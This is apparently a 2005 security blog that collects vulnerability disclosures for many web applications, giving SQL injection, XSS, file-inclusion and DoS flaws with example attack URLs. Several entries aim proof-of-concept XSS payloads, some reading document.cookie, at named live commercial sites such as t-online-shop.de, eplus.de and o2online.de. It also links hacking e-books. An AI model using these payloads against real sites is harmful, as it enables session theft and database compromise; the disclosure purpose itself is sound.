%28%27r0t%27%29%3C%2Fscript%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

ProjectForum 4.7.0 vuln.

ProjectForum 4.7.0 vuln.

Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:http://www.projectforum.com/pf/
affected version:4.7.0 and prior


Product Description:

ProjectForum provides a professional and easy-to-use web-based focus for your team's work and collaboration, helping to move documents and projects forward fast. Its flexible wiki-style forums fill the gap between the scattered flurry of email and the time and expense of meetings or teleconferences. Build a project site or intranet where everyone can actively and directly contribute. Downloadable and hosted versions available.


Vuln. Description:

1. Denial of Service attack
A boundary error in the input passed to "pageid" paremter can be exploited to crash the service by sending a POST request and it can be used for DOS attack.


2. XSS
Missing input validation in various pages and error messages can be exploited to conduct Cross-Site Scripting attacks by inserting arbitrary HTML or script code, which will be executed in a user's browser session when viewed.


examples:

/admin/versions.html?pageid=[CODE]

/admin/adminsignin.html?fwd=%22%3E%3Cscript
%3Ealert('r0t')%3C/script%3E

/support/admin/newpage.html?originalpageid=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E



Solution:
1.
Restrict access to the service (default port 3455/tcp) to ensure that only trusted IP addresses can connect.

Filter malicious characters and character sequences in a HTTP proxy.

2.
Edit the source code to ensure that input is properly sanitised.

DreamPoll SQL inj.

DreamPoll SQL inj.

Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:http://dreamlevels.com/dreampoll.php
affected version: 3.0 final and prior

Product Description:
DreamPoll is an enhanced version of Advanced Poll Builder for webmasters who handle the medium/big websites. It is extremely HANDY TO USE, have nice admin panel, 3-STEPS VISUAL WIZARD to create the POLL and customize the Design. It has all the features of Advanced Poll Builder 1.2, like "COLOR PICKER/Wizard", "Prevent Multiple Votes per IP/ Computer", "Results Statistics" and more [click "visit" for full features list] + 2 more new very useful ones: 1) Default Poll – this allows you to easily set the [default poll]. If you have a lot of html or other pages on your site where you want to place the same poll and want to easily switch between the existent polls so it will automatically starts showing current default poll on all the pages, this feature will save your time. You do not need to change the html code every time you want to show another poll on your pages; 2) Now the results can be shown right on the poll box.


Vuln. Description:
DreamPoll contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "view_Results.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:
/view_Results.php?id=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

WHMCompleteSolution XSS vuln.

WHMCompleteSolution XSS vuln.
Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:http://www.whmcs.com/
affected version:2.1 and prior

Product Description:

WHMCompleteSolution has the features that all web hosts are looking for. Integrated directly with the WHM and cPanel server management software, your WHMCS System will provide you with automated account creation, suspension and termination aswell as keeping track of all clients including their hosting accounts and domains and all due payment dates associated with these. It also allows you to send mailings to individual clients or selected clients in mass with mail merge features to customise the messages. Not only does it handle clients, but it also has an integrated support system including a ticket system which supports attachments, knowledgebase, announcements and downloads.


Vuln. Description:

contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search parameters in "knowledgebase.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

CKGOLD XSS vuln.

CKGOLD XSS vuln.
Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:http://www.cartkeeper.com/
affected version:latest

Product Description:
CKGOLD - E-Commerce Shopping Cart Solution
The CKGold system is a feature rich shopping cart developed for those wishing to host their own store with fine tuned controls for items, inventory, cart and checkout. Below is a list of some of the great features you will find in CKGold. Over the years we've listened to our clients needs and have designed a rich sets of innovative tools to build an effective e-commerce site. We continually plan for improvements and new features based on client feedback and suggestions.


Vuln. Description:

CKGOLD contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search parameters in "search.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

QuickPayPro™ 3.1 Multiple vuln.

QuickPayPro™ 3.1 Multiple vuln.

Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:http://quickpaypro.com/
affected version:3.1 and prior


Product Description:

QuickPayPro.com has been Online for over 3 years now, and the tools we provide you have been refined over the last 4 & 1/2 years! We're a member of the Better Business Bureau and the BBBOnline Reliability Program.
We've spent over $400,000 in developement and has successfully processed nearly $9,000,000 in live sales! It's been refined by over 5,000 users and manages over 90,000 Affiliates & 2.5 Million Subscribers. And the entire system is tested daily by Hacker Safe. Needless to say: This QuickPayPro is a well-oiled machine.



1. SQL inj. vuln.

QuickPayPro™ contains a flaw that allows a remote sql injection attacks.Input passed to the "popupid" "so" "sb" "nr" "subtrackingid" "delete" "trackingid" "customerid" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


2. XSS attack vuln.

QuickPayPro™ contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to into mutiple field parameters like in "/communication/subscribers.tracking.add.php" "/support/tickets.add.php" "/mycompany/categories.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:
/communication/popups.edit.php?
popupid=[SQL]

/communication/customer.tickets.
view.php?so=[SQL]

/communication/customer.tickets.
view.php?so=ASC&sb=[SQL]

/communication/customer.tickets.
view.php?so=ASC&sb=Status&nr=[SQL]

/communication/subscribers.track
ing.edit.php?subtrackingid=[SQL]

/settings/design.php?delete=[SQL]

/tools/tracking.details.php?tra
ckingid=1[SQL]

/mycompany/sales.view.php?custo
merid=1[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

MySQL Auction XSS vuln.

MySQL Auction XSS vuln.

Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:mysqlauction.com
affected version: 3.0 and prior

Product Description:

Full featured, MySQL database driven online auction software. Features include, item question and answer forum, featured listing options, listing fees, auto thumbnail creation. Also inclused a MyAuction section, where members can keep track of items for sale, items they are bidding on, closed/sold items, and a personal watch item list. Member billing handled directly from the web based Admin Panel! A step-by-step installation script will setup the MySQL database tables using your database name, username and password. Use the Admin Panel to customize your auction variables and your new auction site is ready to go online! The software also uses header and footer HTML files, simply modify them to match your existing site for an integrated online auction solution. With this 100% MySQL database driven online auction software package, our goal is to develop powerful database applications, to improve web site server/client interface, and to provide dynamic content with improved performance.


Vuln. Description:

MySQL Auction contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

Jamit Job Board 2.4.x SQL inj.

Jamit Job Board 2.4.x SQL inj.

Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:http://www.jamit.com.au/
affected version:2.4.1 and prior

Product Description:

Job Board Pro is a PHP application for running and managing a jobs portal website. It is written in PHP and supported by a MySQL database. It is a complete script for those that want to run a professional Job Board website, with all the features that you would expect and simple and easy to navigate and use. The Job Board script was designed by applying many of the principles learned from the study of Human-Computer Interaction (HCI). Features includes Employer's area, Job Seeker's area, Email alerts, Job Search, Online resume, Multi-lingual, Dynamic Forms, Billing system for subscriptions & posting credits (integrated with PayPal IPN), and more.


Vuln. Description:

Job Board Pro contains a flaw that allows a remote sql injection attacks.Input passed to the "cat" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:
/index.php?cat=[SqL]



Solution:
Edit the source code to ensure that input is properly sanitised.

Ad Manager Pro SQL vuln.

Ad Manager Pro SQL vuln.

Vuln. dicovered by : r0t
Date: 14 dec. 2005
vendor:www.phpwebscripts.com/admanagerpro/
affected version:2.0 and prior

Product Description:

Quality ad management system. Graphical or text-based ads, detailed statistic with graphs, unlimited ad sizes/zones/ads, paid ads, many more.


Vuln. Description:

Ad Manager Pro contains a flaw that allows a remote sql injection attacks.Input passed to the "ad_number" parameter in "advertiser_statistic.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:
/advertiser_statistic.php?action=
statistic_main&ad_number=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Link Up Gold vuln.

Link Up Gold vuln.

Vuln. dicovered by : r0t
Date: 13 dec. 2005
vendor:http://www.phpwebscripts.com/linkupgold/
affected version:2.5 and prior


Product Description:

An unique script for running your own linksite/search engine. Hundreds of advanced features: Unlimited number of categories in an unlimited number of levels, aliases@ for categories (cross-linked directories, the same feature that have big search engines like Yahoo or Dmoz), unlimited number of links and articles, fully featured paid links (advertisers can pay by using any payment company, also PayPal IPN supported), rating system, fully customizable pages by using templates (all public pages are editable in any HTML editor), multiple skins (15 styles bundled with the software), blacklist, multiple administrators with different rights, integrated poll, ability to count incoming and outgoing hits, user registration, mailing lists, reviews for links and articles, message board and many more. Links and articles may be sorted by title, popularity, incoming hits, date added etc. Pages are dynamic (php extension), also a plugin to create static html files or use Apache Rewrite is available.


Vuln. Description:

1. SQL
Link Up Gold contains a flaw that allows a remote sql injection attacks.Input passed to the "number" parameter in "poll.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

2.XSS
contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "link" "direction" "sort" "phrase[]" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/poll.php?action=vote&number=[SQL]


/tell_friend.php?link=%22%3E%3Csc
ript%3Ealert('r0t')%3C/script%3E

/search.php?action=search_links_
advanced&phrase%5B0%5D=%22%3E%3C
script%3Ealert('r0t')%3C/script%3E

/articles.php?n=122&page=1&sort=
&direction=%22%3E%3Cscript%3Eale
rt('r0t')%3C/script%3E

/articles.php?n=122&page=1&sort
=%22%3E%3Cscript%3Ealert('r0t')
%3C/script%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

VCD-db vuln.

VCD-db vuln.

Vuln. dicovered by : r0t
Date: 13 dec. 2005
vendor:http://vcddb.konni.com/
affected version:V.0.98 and prior

Product Description:
VCD-db is a Free web based software that lets you manage your DVD/VCD/CDs collection on your own website. With VCD-db you can easily add new movies with 2 clicks, movie data is automatically fetched for you from IMDB and/or other sources. VCD-db is highly flexible, runs on multiple database platforms such as MySQL, MSSQL,IBM DB2, PostgreSQL and SQLite. VCD-db supports multiple users so your friends can also register on your VCD-db web and start their own catalog, which can then be compared to yours for conveniance. VCD-db has a built in loan system so you can now easily keep track of all the CD's you lend to friends and family, and even send automatic emails to ask them to return your CD's. User catalogs can easily be exported and saved in numerious ways, such as Excel, XML and can even be exported and then imported to another VCD-db site without any hassle.



Vuln. Description:

SQL.
VCD-db contains a flaw that allows a remote sql injection attacks.Input passed to the "by" parameter in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


XSS.
VCD-db contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "batch" parameter and in Detail search module paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:
/search.php?searchstring=&by=[SQL]

/?page=category&category_id=1&viewmode=
img&batch=%22%3E%3Cscript%3Ealert
('r0t')%3C/script%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

mcGallery PRO vuln.

mcGallery PRO vuln.

Vuln. dicovered by : r0t
Date: 13 dec. 2005
vendor:http://mcgallerypro.com/
affected version: 2.2 and prior


Product Description:

A Pro version of mcGallery. Features: Displays photos, videos and Flash movies; Create thumbnails for photos; Multi-level restricted access; Unlimited number of albums; albums sorted in categories, News system ; Complete admin panel with stats, members administration, design settings; Users can post comments, send e-cards, choose interface language, build their own albums, and download their selection as zip file; Slideshow and user upload with moderation; Automated installation; 7 language files; Frontpage compliance; "register-globals off" compliance. WAP ability for admin, multiple admins, smilies in comments and ecards. Top Ten, upload by email, PNG support, WMV support,and plenty of new little settings. Last added: complete guestbook system.




Vuln. Description:


1.Local file include:
Input passed to the "language" parameter in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from local resources.

2.SQL:
mcGallery PRO contains a flaw that allows a remote sql injection attacks.Input passed to the "id" "start" "album" "rand" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


3.XSS:
mcGallery PRO contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

few examples:

/index.php?language=../FILE

/show.php?start=0&id=[SQL]
/show.php?start=[SQL]
/index.php?album=[SQL]
/show.php?rand=1&id=[SQL]
/show.php?rand=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Mantis bugtracking system XSS vuln.

Mantis bugtracking system XSS vuln.

Vuln. dicovered by : r0t
Date: 13 dec. 2005
vendor:http://www.mantisbt.org/
affected version: 1.0.0rc3,1.0.0rc2 and prior




Product Description:

Mantis is a web-based bugtracking system. It is written in the PHP scripting language and requires the MySQL database and a webserver. Mantis has been installed on Windows, Mac OS, OS/2, and a variety of Unix operating systems. Almost any web browser should be able to function as a client. It is released under the terms of the GNU General Public License (GPL).
Mantis is free to use and modify. It is free to redistribute as long as you abide by the distribution terms of the GPL.



Vuln. Description:

Mantis contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "target_field" parameter in "view_filters_page.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



example:
/view_filters_page.php?for_screen=1&target
_field=%22%3E%3Cscript%3Ealert('r0t')%3C/
script%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

PhpWebGallery multiple SQL inj.

PhpWebGallery multiple SQL inj.

Vuln. dicovered by : r0t
Date: 13 dec. 2005
vendor:http://www.phpwebgallery.net/
affected version: 1.5.1 and prior


Product Description:

PhpWebGallery is a image gallery with a simple installation interface and admin pannel. Features : user management, groups, category privacy status, multi-server support (to store your pictures on another Web site), user comments, HTML templates, virtual categories, multilingual support, advanced search tool, rating, random pictures, EXIF and IPTC support...



Vuln. Description:


PhpWebGallery contains a flaw that allows a remote sql injection attacks.Input passed to the "since" "sort_by" "items_number" "search" "image_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code



examples:

/comments.php?keyword=&author=&cat=0&since
=[SQL]

/comments.php?keyword=&author=&cat=0&since
=1&sort_by=[SQL]

/comments.php?keyword=&author=&cat=0&since
=1&sort_by=date&sort_order=descending&items
_number=[SQL]

/category.php?cat=search&search=[SQL]

/picture.php?cat=best_rated&image_id=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

PHP JackKnife XSS vuln.

PHP JackKnife XSS vuln.

Vuln. dicovered by : r0t
Date: 13 dec. 2005
vendor:http://www.phpjk.com/
affected version: 2.21 and prior

Product Description:

PHP JackKnife is an easily set-up, fast, feature-rich photo gallery script with MySQL or MSSQL databases. PHPJK supports template and user management, private galleries, automatic thumbnail creation, film strip, e-card feature for easy customization to match the rest of a site. PHPJK adds multiple uploads, updated securities, many new features including support for document types (ie tiff, psd, swf, doc, mp3, etc)! Additional features: auto-thumbailing, image upload, rating, searching, unlimited categories and subcategories, unlimited galleries and images, private & locked galleries, bulk import via ftp, dynamic products display, alternate images, eCards, image referencing and much more! It also includes Aricaur.com integration so you can sell prints, t-shirts and gift items with your images on them! PHP & MSSQL/MySQL & Win/*nix



Vuln. Description:

PHP JackKnife contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "sKeywords" parameter in "DisplayResults.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/Search/DisplayResults.php?DOMAIN_Link=&
iSearchID=292&sKeywords=%22%3E%3Cscri
pt%3Ealert%28%27r0t%27%29%3C%2Fscript%3E



Solution:
Edit the source code to ensure that input is properly sanitised.

EncapsGallery SQL inj. vuln.

EncapsGallery SQL inj. vuln.

Vuln. dicovered by : r0t
Date: 13 dec. 2005
vendor:http://powerdev.com.ru/products/encapsgallery/
affected version:1.0.0 and prior

Product Description:

Photogallery, supports different independent layouts/themes. Web-design based on html-templates. Supported http/ftp image upload ,pgsql/mysql database, auto-thumbnails, config-file, web-admin.


Vuln. Description:

EncapsGallery contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:
/gallery.php?page=foto
&action=show_custom&id=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

hack F.A.Q

good offline F.A.Q for begin.

Download-Link:
http://rapidshare.de/files/9083672/FAQ.rar.html


pwd:pridels.blogspot.com

Hacking Unix second edition

Just another good e-book for you in .pdf


Download-Link:
http://rapidshare.de/files/9083446/h.rar.html


pwd:pridels.blogspot.com

Snipe Gallery SQL&XSS vuln.

Snipe Gallery SQL&XSS vuln.

Vuln. dicovered by : r0t
Date: 13 dec. 2005
vendor:http://www.snipegallery.com/
affected version:3.1.4 and prior

Product Description:

Snipe Gallery is a searchable PHP/mySQL photo gallery manager. Features: Easy to install; Dynamic thumbnailing, but only in the admin, and only if the thumbnail doesn't already exist, to keep the server load down; Ability for admin to supress images that should not appear in user view; Supports PNG, JPG, and GIF images (depending on your version of the GDlib); Error checking to prevent admin from being able to delete categories with images or subcategories within them; "Silent" keyword assignment in admin; RSS Newsfeed tie-in, IPTC metadata import; bulk image import via .zip file and/or local files, cropping/thumbnailing tool to allow cropping and custom thumbnailing on the fly, and Images are searchable by title, description, photographer, location, and keyword.




Vuln. Description:

1. SQL inj.
Snipe Gallery contains a flaw that allows a remote sql injection attacks.Input passed to the "gallery_id" and "image_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

2. XSS attack
Snipe Gallery contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "keyword" parameter in "search.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

SQL
/view.php?gallery_id=[SQL]
/image.php?page=1&gallery_id=1&image_id=[SQL]

XSS
/search.php?keyword=%22%3E%3Cscript%3Ealert%28%
27r0t%27%29%3C%2Fscript%3E&search_cat=&search_t
ype=and


Solution:
Edit the source code to ensure that input is properly sanitised.

Plogger SQL&XSS vuln.

Plogger SQL&XSS vuln.

Vuln. dicovered by : r0t
Date: 13 dec. 2005
vendor:http://www.plogger.org/
affected version:Beta 2 and prior


Product Description:

Plogger is the definitive open-source web photo gallery. Simple to integrate with your site, lightweight, and packed with useful features, Plogger leaves the other image galleries in the dust. Automatic thumbnail generation, cruft free URLs, RSS support, powerful password protected admin area, picture comments, mass downloading and integrated JavaScript slideshow are just a few of the features you'll find in this script. Plogger requires PHP4, MySQL 3.23+ and GD1.0+.



Vuln. Description:

1. SQL inj.
Plogger contains a flaw that allows a remote sql injection attacks.Input passed to the "page" and "id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

2. XSS attack
Plogger contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "level" and "searchterms" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

SQL
/index.php?sortdir=ASC&level=album&id=[SQL]
/?page=[SQL]

XSS
/index.php?level=%22%3E%3Cscript%3
Ealert('r0t')%3C/script%3E

/index.php?level=search&searchterms=%22%3E%
3Cscript%3Ealert('r0t')%3C/script%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

www.bahnshop.de multiple vuln.

https://www.bahnshop.de/cgi-bin/dbshop
?HTML=[include]

https://www.bahnshop.de/cgi-bin/dbshop?HTML=
show/db_show.htm&VS_TAB_NAME=WEIHNACHTEN&VS
_INDEX=''

https://www.bahnshop.de/cgi-bin/dbshop?HTML=
show/db_show.htm&VS_TAB_NAME=WEIHNACHTEN&VS_
INDEX=%22%3E%3Cscript%3Ealert('r0t')%3C/scr
ipt%3E

https://www.bahnshop.de/cgi-bin/dbshop?HTML=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

https://www.bahnshop.de/cgi-bin/dbshop?HTML=
show/db_show.htm&VS_TAB_NAME=WEIHNACHTEN&VS_
INDEX=1130849516131&VS_PARENT_ID=%22%3E%3C
script%3Ealert('r0t')%3C/script%3E

t-online.de SHOP XSS

What i know that T-online is from Deutsche Tellekom , main IPS in germany , any also big company and there work good specialists.

any way , "searchHandle" paramter isnt properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

live example:

http://www.t-online-shop.de/tonline/product.do
?action=getProductDetail&product=7993&searchHan
dle=%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E

eplus.de XSS

http://www.eplus.de/frame.asp?go=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3E

https://www.eplus.de/frame.asp?go=/handys/0/0_1
/0_1_merkzettel.asp?ref=%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E

https://www.eplus.de/frame.asp?go=https%3
A//www.eplus.de/kundenservice/0/0/0_onlinehilfe
_suche_ausgabe.asp%3FTyp%3DDokument%26S
ubTyp1%3DFAQ%26SubTyp2%3DDownload%26E
ingabe1%3Dn223i%26Eingabe2%3D%26Eingabe
3%3D%26Verknuepfung1%3DAND%26Verknuepfun
g2%3D%26Verknuepfung3%3D%26Sortierung%3D
%2522%253E%253Cscript%253Ealert%28docume
nt.cookie%29%253C/script%253E%26AusgabeSe
ite%3D0%255Fonlinehilfe%255Fsuche%255Fau
sgabe%252Easp

https://www.eplus.de/frame.asp?go=https%3A//www.
eplus.de/kundenservice/0/0/0_onlinehilfe_faq_ausgab
e.asp%3Frubrik%3D79%26main%3D79%26start%3D
%2522%253E%253Cscript%253Ealert%28document.
cookie%29%253C/script%253E

https://www.eplus.de/frame.asp?go=https%3A//www.e
plus.de/kundenservice/0/0/0_onlinehilfe_faq_ausgabe.
asp%3Frubrik%3D70%26main%3D%2522%253E%
253Cscript%253Ealert%28document.cookie%29%
253C/script%253E

https://www.eplus.de/frame.asp?go=https%3A//www.
eplus.de/kundenservice/0/0/0_onlinehilfe_faq_ausgabe.
asp%3Frubrik%3D%2522%253E%253Cscript%253Eale
rt%28document.cookie%29%253C/script%253E

shop2.o2online.de XSS vuln.

o2 is my favorite mobile phone operator, thats why i checked they website .

Vuln.description.

o2 shop a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "nidx" and "tariffType" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

live examples:


http://shop2.o2online.de/o2/interessenten/
necos/handys/siemens/index.html?nidx=%22%3
E%3Cscript%3Ealert(document.cookie)%3C/
script%3E


http://shop2.o2online.de/o2/interessenten/
necos/handys/siemens/index.html?nidx=6&tar
iffType=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Magic Forum Personal SQL&XSS vuln.

Magic Forum Personal SQL&XSS vuln.

Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:www.cfmagic.com/products/magicforumper.cfm
affected version:2.5 and prior

Product Description:

Magic Forum Personal is our full-featured, yet value priced, discussion forum application. Designed for a small to medium sized site, it has all of the features required for a discussion forum without out all of the fluff, not to mention high price, found in most forum apps. Primary forum features include: registration of members, use of moderators, optional approval of posts, moderators can approve, edit, delete any post, complete member profile area, members use post signatures, subscriptions to posts, PHTML (Pseudo HTML) based editor interface, full-featured search function, and much, much more. Also, a complete admin area with tons of options that allow you to tailor the app to your sites needs. Some of the options include: Use PHTML, Show Stats, Show Moderators, Track Views, Number of Topics/Replies Per Page, forum wide Date/Time Display, Allow Subscriptions, Allow Signatures, Use of Member Levels, Allow Save Login, Check Member Email and many, many more. We have a fully-functional online demo available and you can get more info at the Magic Forum Personal home page.


1. SQL inj vuln.
Magic Forum Personal contains a flaw that allows a remote sql injection attacks.Input passed to the "ForumID" "Thread" "ThreadID" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

examples:
/view_forum.cfm?ForumID=1[SQL]
/view_thread.cfm?ForumID=1[SQL]
/view_thread.cfm?ForumID=1&ThreadID=1&Thread=1[SQL]
/view_thread.cfm?ForumID=1&ThreadID=1[SQL]


2. XSS
Magic Forum Personal contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search parameters in "search_forums.cfm" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

Magic Book v2.0 Professional Vuln.

Magic Book v2.0 Professional Vuln.

Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:www.cfmagic.com/products/magicbook.cfm
affected version:v.2.0 and prior

Product Description:
Magic Book Professional Edition is our totally loaded Guest Book application. It has all the things you might expect from any Guest Book available today. It allows visitors to add their comments as well as name and email address to the book in an automated process. These are then displayed in order of input for all your visitors to see. But that is where any similarity with others ends as we have added features not found on any other Guest Book anywhere.

Vuln. Description:
Magic Forum Personal contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "StartRow" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Also with errors wich are provided also in example attacker can view senstive information , Directory Travesal..etc.


example:
/book.cfm?StartRow=%22%3E%3Cscript
%3Ealert('r0t')%3C/script%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

Magic List pro 2.5 SQL inj. vuln.

Magic List pro 2.5 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:www.cfmagic.com/products/magiclistpro.cfm
affected version:2.5

Product Description:
Magic List Pro is our full-featured opt-in mailing list application, and CFMagic's flagship product. It has all of the features required for medium to large sites that want to generate and maintain mailing lists as well as collect a demographic information database. Have thousands of customer email addresses to manage? Magic List Pro is the answer, now more than ever!


Vuln. Description:
Magic List Pro contains a flaw that allows a remote sql injection attacks.Input passed to the "ListID" parameter in "view_archive.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:
/view_archive.cfm?ListID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

CF_Nuke v4.6 Multiple vuln.

CF_Nuke v4.6 Multiple vuln.

Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:http://www.mycfnuke.com/
affected version:v4.6 and prior

Product Description:

CF_Nuke is a free easy-to-setup & easy-to-use open source ColdFusion, community style web application. Offering greater control over web site maintenance, and increased performance over previous versions, CF_Nuke 4.6 is coming into it’s own as a stand-alone web portal similar to phpNuke.
Core Features - Links, News and Reviews, Favorite Quotations - Private Message System for Members - Downloads - Themes - Recommend to Friend - Site FAQ System - Keyword and Category search - Member Registration - Users can submit News, Reviews, Quotations & Links for approval - extensive Admin capabilities. Additional Modules (Forums. Photo Gallary, Shoutbox, RSS, Calendar, Who's Online, NewLetters, etc....) are being made available by our Awesome members.




Vuln. Description:


1) Input passed to the "sector" and "page" parameters in "index.cfm" isn't properly sanitised before being used to include ".cfm" files. This can be exploited to include arbitrary ".cfm" files that are accessible on the server.

Successful exploitation requires that "Sandbox Security" is not enabled for the directory.

2) Input passed to the "cat", "topic", and "newsid" parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Successful exploitation requires that "Global Script Protection" is disabled.




examples:
/index.cfm?sector=../local file

/index.cfm?sector=quotes&page=../local file


/index.cfm?sector=news&page=topic&topic=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?sector=links&page=links&cmd=view
&cat=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?sector=news&page=read&newsid=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

Solution:
Look for more secure alternative.:)

A-FAQ SQL inj. vuln.

A-FAQ SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:http://www.alanward.net/afaq
affected version:1.0 and prior

Product Description:
A-FAQ is an ASP application used for managing a database of questions and answers. Features include categories, ratings and full administration area.


Vuln. Description:
Input passed to the "faqid" parameter in "faqDspItem.asp" and "catcode" parameter in "faqDsp.asp" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:
/faqDspItem.asp?faqid=[SQL]
/faqDsp.asp?catcode=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

IISWorks ASP KnowledgeBase 2.x XSS vuln.

IISWorks ASP KnowledgeBase 2.x XSS vuln.
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:http://www.iisworks.com/aspkb/
affected version:2.x and prior

Product Description:
